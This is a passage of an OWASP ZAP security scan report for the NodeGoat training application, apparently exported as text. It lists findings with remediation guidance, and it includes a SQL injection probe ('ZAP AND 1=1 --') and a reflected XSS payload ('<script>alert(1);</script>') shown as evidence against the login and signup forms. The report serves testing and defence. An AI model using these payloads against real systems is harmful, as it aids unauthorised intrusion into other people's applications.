To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id: 79
WASC Id: 8
Source ID: 1

High (Medium): SQL Injection
Description

SQL injection may be possible.

URL: http://nodegoat.herokuapp.com/login
Method: POST
Parameter: userName
Attack: ZAP AND 1=1 --

URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: userName
Attack: ZAP AND 1=1 --

Instances: 2
Solution

Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.

Other information

The page results were successfully manipulated using the boolean conditions [ZAP AND 1=1 -- ] and [ZAP AND 1=2 -- ]

The parameter value being modified was NOT stripped from the HTML output for the purposes of the comparison

Data was returned for the original parameter.

The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter

Reference

https://www.owasp.org/index.php/Top_10_2010-A1

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

CWE Id: 89
WASC Id: 19
Source ID: 1

High (Low): Cross Site Scripting (Reflected)
Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL: http://nodegoat.herokuapp.com/login
Method: POST
Parameter: userName
Attack: '"<script>alert(1);</script>
Evidence: '"<script>alert(1);</script>

Instances: 1
Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id: 79
WASC Id: 8
Source ID: 1

Medium (Medium): X-Frame-Options Header Not Set
Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL: http://nodegoat.herokuapp.com/dashboard
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a3
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/redos
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/benefits
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/profile
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a4
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a1
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a9
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/signup
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a2
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/allocations/6
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a7
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/memos
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a10
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a8
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/login
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/contributions
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial/a5
Method: GET
Parameter: X-Frame-Options

URL: http://nodegoat.herokuapp.com/tutorial
Method: GET
Parameter: X-Frame-Options

Instances: 21
Solution

Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. ALLOW-FROM allows specific websites to frame the web page in supported web browsers).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx

CWE Id: 16
WASC Id: 15
Source ID: 3

Medium (Medium): Application Error Disclosure
Description

This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.

URL: http://nodegoat.herokuapp.com/tutorial/a9%23npm%20outdated
Method: GET
Evidence: HTTP/1.1 500 Internal Server Error

Instances: 1
Solution

Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.

Reference

CWE Id: 200
WASC Id: 13
Source ID: 3

Low (Medium): X-Content-Type-Options Header Missing
Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URL: http://tile-service.weather.microsoft.com/en-US/livetile/preinstall?region=CN&appid=C98EA5B0842DBB9405BBF071E1DA76512D21FE36&FORM=Threshold
Method: GET
Parameter: X-Content-Type-Options

Instances: 1
Solution

Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Other information

This issue still applies to error type pages (401, 403, 500, etc) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

At "High" threshold this scanner will not alert on client or server error responses.

Reference

http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

https://www.owasp.org/index.php/List_of_useful_HTTP_headers

CWE Id: 16
WASC Id: 15
Source ID: 3

Low (Medium): Cross-Domain JavaScript Source File Inclusion
Description

The page includes one or more script files from a third-party domain.

URL: http://nodegoat.herokuapp.com/tutorial/a6
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/login
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");

          function areCookiesEnabled() {
            var cookieEnabled = navigator.cookieEnabled;

            // When cookieEnabled flag is present and false then cookies are disabled.
            if (cookieEnabled === false) {
              return false;
            }

            // try to set a test cookie if we can't see any cookies and we're using
            // either a browser that doesn't support navigator.cookieEnabled
            // or IE (which always returns true for navigator.cookieEnabled)
            if (!document.cookie && (cookieEnabled === null || /*@cc_on!@*/ false)) {
              document.cookie = "testcookie=1";

              if (!document.cookie) {
                return false;
              } else {
                document.cookie = "testcookie=; expires=" + new Date(0).toUTCString();
              }
            }

            return true;
          }

          $(document).ready(function() {
            if (!areCookiesEnabled()) {
              $("#page-wrapper").prepend("<div class=\"row\"><div class=\"col-lg-12\"><div class=\"alert alert-danger\">Cookies are not enabled on your browser. Please enable cookies in your browser preferences to continue.</div></div></div>");
            }
          });
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a10
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a7
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a8
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/redos
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a9
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a1
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/signup
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a2
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a3
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a4
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial/a5
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

URL: http://nodegoat.herokuapp.com/tutorial
Method: GET
Parameter: http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence: <script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>");
          </script>

Instances: 15
Solution

Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

Reference

CWE Id829
WASC Id15
Source ID3
Low (Medium) Web Browser XSS Protection Not Enabled
Description

Web Browser XSS Protection is not enabled, or is disabled by the configuration of the 'X-XSS-Protection' HTTP response header on the web server.

URL: http://nodegoat.herokuapp.com/tutorial/a6
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/robots.txt
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a5
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/benefits
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/redos
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a9%23npm%20outdated
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a4
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/signup
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/sitemap.xml
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a3
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/login
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a2
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a1
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a9
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/allocations/6
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/dashboard
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/tutorial/a8
Method: GET
Parameter: X-XSS-Protection
URL: http://nodegoat.herokuapp.com/ZAP
Method: GET
Parameter: X-XSS-Protection
Instances: 25
Solution

Ensure that the web browser's XSS filter is enabled, by setting the X-XSS-Protection HTTP response header to '1'.

Other information

The X-XSS-Protection HTTP response header allows the web server to enable or disable the web browser's XSS protection mechanism. The following values would attempt to enable it:

X-XSS-Protection: 1; mode=block

X-XSS-Protection: 1; report=http://www.example.com/xss

The following value would disable it:

X-XSS-Protection: 0

The X-XSS-Protection HTTP response header is currently supported on Internet Explorer, Chrome and Safari (WebKit).

Note that this alert is only raised if the response body could potentially contain an XSS payload (with a text-based content type, with a non-zero length).

Reference

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

https://blog.veracode.com/2014/03/guidelines-for-setting-security-headers/

CWE Id: 933
WASC Id: 14
Source ID: 3
Low (Medium) X-Content-Type-Options Header Missing
Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URL: http://nodegoat.herokuapp.com/memos
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/a9
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/allocations/6
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/a1
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/images/owasplogo.png
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/vendor/chart/raphael-min.js
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/a2
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/login
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/vendor/theme/sb-admin.css
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/vendor/bootstrap/bootstrap-tour.js
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/a7
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/a10
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/dashboard
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/redos
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/tutorial/a8
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/js/tour/redirects-steps.js
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/vendor/chart/morris-0.4.3.min.js
Method: GET
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: X-Content-Type-Options
URL: http://nodegoat.herokuapp.com/vendor/html5shiv.js
Method: GET
Parameter: X-Content-Type-Options
Instances: 34
Solution

Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Other information

This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

At "High" threshold this scanner will not alert on client or server error responses.

Reference

http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

https://www.owasp.org/index.php/List_of_useful_HTTP_headers

CWE Id: 16
WASC Id: 15
Source ID: 3
Low (Medium) Password Autocomplete in Browser
Description

The AUTOCOMPLETE attribute is not disabled on an HTML FORM/INPUT element containing password type input. Passwords may be stored in browsers and retrieved.

URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: verify
Evidence: <input type="password" class="form-control" id="verify" name="verify" value="" placeholder="Enter password">
URL: http://nodegoat.herokuapp.com/login
Method: GET
Parameter: password
Evidence: <input type="password" class="form-control" id="password" name="password" value="" placeholder="Enter Password">
URL: http://nodegoat.herokuapp.com/signup
Method: GET
Parameter: verify
Evidence: <input type="password" class="form-control" id="verify" name="verify" value="" placeholder="Enter password">
URL: http://nodegoat.herokuapp.com/signup
Method: GET
Parameter: password
Evidence: <input type="password" class="form-control" id="password" name="password" value="" placeholder="Enter password">
URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: password
Evidence: <input type="password" class="form-control" id="password" name="password" value="" placeholder="Enter password">
Instances: 5
Solution

Turn off the AUTOCOMPLETE attribute in forms or individual input elements containing password inputs by using AUTOCOMPLETE='OFF'.

Reference

http://www.w3schools.com/tags/att_input_autocomplete.asp

https://msdn.microsoft.com/en-us/library/ms533486%28v=vs.85%29.aspx

CWE Id: 525
WASC Id: 15
Source ID: 3
Low (Medium) X-Content-Type-Options Header Missing
Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URL: http://www.msftncsi.com/ncsi.txt
Method: GET
Parameter: X-Content-Type-Options
Instances: 1
Solution

Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Other information

This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

At "High" threshold this scanner will not alert on client or server error responses.

Reference

http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

https://www.owasp.org/index.php/List_of_useful_HTTP_headers

CWE Id: 16
WASC Id: 15
Source ID: 3